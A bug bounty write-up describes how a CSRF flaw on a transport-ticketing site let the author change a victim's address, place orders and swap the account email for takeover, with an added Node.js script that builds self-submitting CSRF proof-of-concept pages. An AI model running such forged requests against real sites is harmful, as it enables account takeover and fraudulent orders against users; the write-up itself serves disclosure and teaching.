My First CSRF to Account Takeover worth $750

Before I start, I want to take a moment to thank all who helped me learn Web Application Security and Bug Bounty Hunting! :)

Hello, guys. The program was a private invite and I am still working with it, so for the sake of the program's privacy let us call it “example.com” in this writeup.

I got this invite around 6 months back. The website lets users order public transport services (e.g. purchasing tickets and passes) and stores user information like card details, home address, work address, etc.

To test for CSRF, I created two accounts, one for the attacker and another for the victim. Let us call them “attacker@gmail.com” and “victim@gmail.com”.


Now, I filled in the details for both accounts. Then I started making changes from the attacker's account, like adding a work address and placing an order. I turned Burp Intercept on and clicked the “save” button. Here is the Burp request which I captured.

Now, I generated the CSRF PoC using Burp Suite and saved it as an HTML page, then sent it to the victim, who was logged in using the Chrome browser. I opened the HTML page in a new tab of that Chrome browser and refreshed the page where the victim was logged in. And boom… the work address of the victim was changed to “bla….bla…bla” and a new order was placed on behalf of the victim. The request went through with nothing but the victim's session cookie to authenticate it, which is exactly what an anti-CSRF token is there to prevent. As card details had not been added to either account, the order was eligible for on-the-spot payment.
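The two steps above (capture the request, turn it into a self-submitting page) are what Burp's “Generate CSRF PoC” does. The following Node.js script is an added example, not code from the writeup or from Burp, that reproduces that generator and adds the triage a tester does first: is the request forgeable from a plain HTML form at all? The captured request (endpoint `/account/addresses`, the `work_address` and `city` parameters, the cookie value) is a constructed sample, since the page does not reproduce the real request.

```javascript
// Added example, not code from the original writeup: reproduces what Burp's
// "Generate CSRF PoC" does for a captured form request, plus a quick triage
// of whether the request is forgeable at all. The captured request below is
// constructed for illustration; the endpoint, parameter names and values are
// assumptions, since the page does not reproduce the real request.

// A captured request, as Burp would show it (constructed sample).
const capturedSaveAddress = {
  method: 'POST',
  url: 'https://example.com/account/addresses',
  headers: {
    'Host': 'example.com',
    'Cookie': 'session=victim-session-cookie', // ambient credential the browser adds
    'Content-Type': 'application/x-www-form-urlencoded',
  },
  body: 'work_address=bla....bla...bla&city=Anytown',
};

// Parse a urlencoded body into name/value pairs (what becomes hidden inputs).
function parseFormBody(body) {
  return Object.fromEntries(new URLSearchParams(body));
}

// Triage: list the reasons a plain HTML-form PoC would NOT work.
// An empty list means the request is worth trying.
function csrfBlockers(req) {
  const blockers = [];
  const h = Object.fromEntries(
    Object.entries(req.headers).map(([k, v]) => [k.toLowerCase(), v]));
  if (!h.cookie) {
    blockers.push('no Cookie header: the session is not sent automatically');
  }
  if (h.authorization) {
    blockers.push('Authorization header: a forged form cannot add it');
  }
  // Only these content types can come out of an HTML form; JSON cannot.
  const ct = (h['content-type'] || '').split(';')[0].trim();
  const formTypes = ['application/x-www-form-urlencoded', 'multipart/form-data', 'text/plain', ''];
  if (!formTypes.includes(ct)) {
    blockers.push(`Content-Type ${ct} cannot be produced by an HTML form`);
  }
  for (const name of Object.keys(parseFormBody(req.body))) {
    if (/csrf|xsrf|token|nonce|authenticity/i.test(name)) {
      blockers.push(`parameter "${name}" looks like an anti-CSRF token`);
    }
  }
  return blockers;
}

// Build the self-submitting PoC page. Values are HTML-escaped so a value
// containing quotes or angle brackets cannot break out of its attribute.
function buildCsrfPoc(req) {
  const esc = (s) => String(s).replace(/[&<>"']/g, (c) =>
    ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c]));
  const inputs = Object.entries(parseFormBody(req.body))
    .map(([k, v]) => `    <input type="hidden" name="${esc(k)}" value="${esc(v)}">`)
    .join('\n');
  return [
    '<!DOCTYPE html>',
    '<html><body>',
    `  <form id="csrf" action="${esc(req.url)}" method="${esc(req.method)}">`,
    inputs,
    '  </form>',
    "  <script>document.getElementById('csrf').submit();</script>",
    '</body></html>',
  ].join('\n');
}

// Run directly: print the triage result and the PoC page.
if (typeof require !== 'undefined' && require.main === module) {
  const blockers = csrfBlockers(capturedSaveAddress);
  console.log(blockers.length ? blockers : 'no blockers, generating PoC');
  console.log(buildCsrfPoc(capturedSaveAddress));
}
```

Save the printed HTML and open it in a browser that holds the victim's session; the `submit()` call fires on load, the browser attaches the session cookie, and the server sees a request it cannot distinguish from one the victim made on the real settings page. The triage matters because the same trick fails against a JSON endpoint, a request authenticated by an `Authorization` header, or a form that already carries a token the server actually validates.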

Now… I thought that if the attacker is able to place an order on behalf of the victim, he could probably also take over the victim's account. I said to myself, let's check it out.. :)

Now, to take over the account, I first went to the settings page of the attacker's account, entered a temporary email address from temp-mail.org, and captured the request in Burp by re-saving the same information without any changes. Then I generated the CSRF PoC for it and sent it to the victim. As soon as I opened the page in the victim's browser, the email of the account changed from “victim@gmail.com” to the temp-mail one. Once the account's email points at a mailbox the attacker controls, the attacker can typically finish the takeover through the normal password-reset flow. Then I was like….

Finally, I wrote a nice report and submitted it to the program. The company took almost 3 months to respond and closed the report by paying $750 within the following month. Although it was a bit low for an account takeover ;).

I thought of publishing this writeup a million times but I am lazy! Lol! :P

Thanks for being patient and reading this writeup. This is my first ever writeup. I hope you all like it; let me know if you want me to include anything else in my next writeup, or if there are any mistakes in this one.

You can always find me on:
Twitter: https://twitter.com/inishantsinha
LinkedIn: https://www.linkedin.com/in/nishantsaurav/

:) :)